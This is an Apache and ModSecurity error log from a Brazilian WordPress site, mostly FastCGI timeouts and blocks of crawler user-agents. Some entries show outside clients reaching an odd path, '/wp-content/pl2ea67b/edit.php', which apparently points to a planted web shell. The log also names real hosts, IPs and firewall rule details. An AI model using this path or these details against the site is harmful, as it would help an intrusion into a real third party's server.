[Tue Mar 17 02:50:54.121827 2026] [proxy_fcgi:error] [pid 2305:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48428] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:51:15.130526 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48582] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:51:36.169829 2026] [proxy_fcgi:error] [pid 4740:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48726] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:51:57.118918 2026] [proxy_fcgi:error] [pid 11293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48884] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:52:18.141852 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49148] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:52:29.629901 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.228.16:36616] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjsHQQohV2v-7oj5HHTBwAAAZQ"]
[Tue Mar 17 02:52:39.161824 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:53:00.052183 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49580] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:53:21.821919 2026] [proxy_fcgi:error] [pid 2325:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49786] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:53:43.130595 2026] [proxy_fcgi:error] [pid 11293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49998] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:54:04.048100 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50124] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:54:26.229808 2026] [proxy_fcgi:error] [pid 2325:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50334] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:54:48.050199 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50512] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:55:09.185802 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50684] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:55:30.157789 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:55:51.133813 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51066] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:56:12.103371 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.244.31:46102] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjs_KBJNF7axNlVR0XVagAAAAY"]
[Tue Mar 17 02:56:12.106042 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51180] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:56:33.133791 2026] [proxy_fcgi:error] [pid 2304:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:56:54.134204 2026] [proxy_fcgi:error] [pid 2304:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51560] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:57:15.033963 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51794] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:57:36.142427 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52042] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:57:53.411703 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.228.16:35384] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjtYZDEJR9VXonE_-0iAgAAAQI"]
[Tue Mar 17 02:57:57.151805 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52426] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:58:18.137817 2026] [proxy_fcgi:error] [pid 11293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:58:39.133845 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52702] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:59:01.041669 2026] [proxy_fcgi:error] [pid 11469:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:59:22.060079 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 02:59:44.129957 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:00:05.134364 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53472] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:00:26.129785 2026] [proxy_fcgi:error] [pid 11293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:00:47.126327 2026] [proxy_fcgi:error] [pid 2325:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53776] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:01:15.057290 2026] [proxy_fcgi:error] [pid 2305:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53920] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:01:22.069997 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.244.31:44520] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjuMu82sZHvlq4xgHqbXgAAApA"]
[Tue Mar 17 03:01:36.145807 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:01:58.168911 2026] [proxy_fcgi:error] [pid 2305:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:02:19.138318 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:02:40.140013 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:03:00.135248 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.228.16:59026] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjulAfYLcKp6Sb5AeIQTQAAAFE"]
[Tue Mar 17 03:03:01.139727 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54734] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:03:22.125909 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:03:44.137722 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55012] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:04:06.129815 2026] [proxy_fcgi:error] [pid 11469:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55202] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:04:27.121791 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:04:48.121823 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:05:09.166024 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:05:31.045868 2026] [proxy_fcgi:error] [pid 2304:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55988] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:05:53.074918 2026] [proxy_fcgi:error] [pid 2325:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56182] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:06:14.057850 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:06:36.133815 2026] [proxy_fcgi:error] [pid 2304:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56586] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:06:58.149018 2026] [proxy_fcgi:error] [pid 11469:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56822] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:07:19.129917 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57020] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:07:40.176982 2026] [proxy_fcgi:error] [pid 11293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57204] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:08:02.134497 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:08:23.029815 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57676] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:08:28.793071 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.228.16:35564] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjv3NCmCSWTlPouqoqj4wAAANM"]
[Tue Mar 17 03:08:44.116685 2026] [proxy_fcgi:error] [pid 4740:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57948] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:09:06.033814 2026] [proxy_fcgi:error] [pid 2304:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58162] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:09:28.121778 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:09:49.133804 2026] [proxy_fcgi:error] [pid 2304:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58502] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:10:10.121804 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58696] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:10:32.137826 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:10:53.116042 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59010] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:11:14.057819 2026] [proxy_fcgi:error] [pid 2304:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 03:11:33.624813 2026] [proxy_fcgi:error] [pid 2305:tid 140411599251200] [client 179.188.53.243:59330] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.624855 2026] [proxy_fcgi:error] [pid 2305:tid 140411599251200] (104)Connection reset by peer: [client 179.188.53.243:59330] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.646040 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] [client 179.188.53.243:59728] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.646081 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (104)Connection reset by peer: [client 179.188.53.243:59728] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.665837 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] [client 179.188.53.243:33040] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.665890 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (104)Connection reset by peer: [client 179.188.53.243:33040] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.668336 2026] [proxy_fcgi:error] [pid 11293:tid 140411716749056] [client 179.188.53.243:59574] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.668367 2026] [proxy_fcgi:error] [pid 11293:tid 140411716749056] (104)Connection reset by peer: [client 179.188.53.243:59574] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.668593 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] [client 179.188.53.243:60590] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.668617 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (104)Connection reset by peer: [client 179.188.53.243:60590] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.668675 2026] [proxy_fcgi:error] [pid 11469:tid 140411624429312] [client 179.188.53.243:32876] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.668696 2026] [proxy_fcgi:error] [pid 11469:tid 140411624429312] (104)Connection reset by peer: [client 179.188.53.243:32876] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.668777 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] [client 179.188.53.243:59912] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.668818 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (104)Connection reset by peer: [client 179.188.53.243:59912] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.669172 2026] [proxy_fcgi:error] [pid 4740:tid 140411548894976] [client 179.188.53.243:33312] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.669191 2026] [proxy_fcgi:error] [pid 4740:tid 140411548894976] (104)Connection reset by peer: [client 179.188.53.243:33312] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.674337 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] [client 179.188.53.243:33624] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.674380 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (104)Connection reset by peer: [client 179.188.53.243:33624] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.690714 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] [client 69.197.179.242:57274] AH01067: Failed to read FastCGI header, referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697
[Tue Mar 17 03:11:33.690768 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (104)Connection reset by peer: [client 69.197.179.242:57274] AH01075: Error dispatching request to : , referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php?id=41697
[Tue Mar 17 03:11:33.700392 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] [client 179.188.53.243:60118] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.700439 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (104)Connection reset by peer: [client 179.188.53.243:60118] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.701528 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] [client 179.188.53.243:60380] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.701557 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:60380] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.722473 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] [client 179.188.53.243:60746] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.722515 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:60746] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.731002 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] [client 179.188.53.243:60964] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.731035 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] (104)Connection reset by peer: [client 179.188.53.243:60964] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:33.731460 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] [client 179.188.53.243:33514] AH01067: Failed to read FastCGI header
[Tue Mar 17 03:11:33.731502 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] (104)Connection reset by peer: [client 179.188.53.243:33514] AH01075: Error dispatching request to : 
[Tue Mar 17 03:11:54.212742 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.244.31:53550] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjwqqBJNF7axNlVR0XWvAAAAAc"]
[Tue Mar 17 03:13:32.966944 2026] [:error] [pid 2325:tid 140411699963648] [client 74.7.228.16:53740] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjxDO82sZHvlq4xgHqcFAAAAoU"]
[Tue Mar 17 03:18:33.259265 2026] [:error] [pid 4740:tid 140411741927168] [client 74.7.228.16:36576] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjyOQfYLcKp6Sb5AeIRHgAAAEA"]
[Tue Mar 17 03:19:12.774135 2026] [:error] [pid 2304:tid 140411590858496] [client 74.7.244.31:54600] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjyYMh3JZxwdBQwPYHNigAAAJI"]
[Tue Mar 17 03:24:11.723239 2026] [:error] [pid 2305:tid 140411733534464] [client 74.7.228.16:37526] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjziwQohV2v-7oj5HHUzgAAAYE"]
[Tue Mar 17 03:26:55.111814 2026] [:error] [pid 2304:tid 140411599251200] [client 204.12.208.18:59736] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/pl2ea67b/edit.php"] [unique_id "abj0L8h3JZxwdBQwPYHOCgAAAJE"], referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php
[Tue Mar 17 03:29:42.311963 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.244.31:39178] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj01tCmCSWTlPouqoqlNwAAAMM"]
[Tue Mar 17 03:30:17.554810 2026] [:error] [pid 4740:tid 140411683178240] [client 74.7.228.16:58454] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj0-QfYLcKp6Sb5AeIRzgAAAEc"]
[Tue Mar 17 03:34:44.022836 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.244.31:49214] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj2BJDEJR9VXonE_-0ldwAAARQ"]
[Tue Mar 17 03:36:09.324235 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.228.16:53606] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj2WQfYLcKp6Sb5AeISPgAAAFE"]
[Tue Mar 17 03:40:44.191615 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.244.31:54238] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj3bKBJNF7axNlVR0XYZwAAAAg"]
[Tue Mar 17 03:45:49.715650 2026] [:error] [pid 2304:tid 140411599251200] [client 74.7.244.31:55902] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj4nch3JZxwdBQwPYHPDwAAAJE"]
[Tue Mar 17 03:48:15.198475 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.228.16:40052] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj5L-82sZHvlq4xgHqeLwAAAoQ"]
[Tue Mar 17 03:51:14.741582 2026] [:error] [pid 4740:tid 140411699963648] [client 74.7.244.31:44338] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj54gfYLcKp6Sb5AeITPAAAAEU"]
[Tue Mar 17 03:53:54.038848 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.228.16:59406] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj6gqBJNF7axNlVR0XZAQAAAAo"]
[Tue Mar 17 03:56:21.000156 2026] [:error] [pid 11293:tid 140411590858496] [client 74.7.244.31:48710] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj7FNCmCSWTlPouqoqmvgAAANI"]
[Tue Mar 17 03:59:03.618882 2026] [:error] [pid 2305:tid 140411716749056] [client 74.7.228.16:42862] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj7twQohV2v-7oj5HHWzgAAAYM"]
[Tue Mar 17 04:01:26.284755 2026] [:error] [pid 2304:tid 140411548894976] [client 74.7.244.31:49634] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj8Rsh3JZxwdBQwPYHQGQAAAJc"]
[Tue Mar 17 04:05:03.806356 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.228.16:41580] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abj9H9CmCSWTlPouqoqnPgAAAMM"]
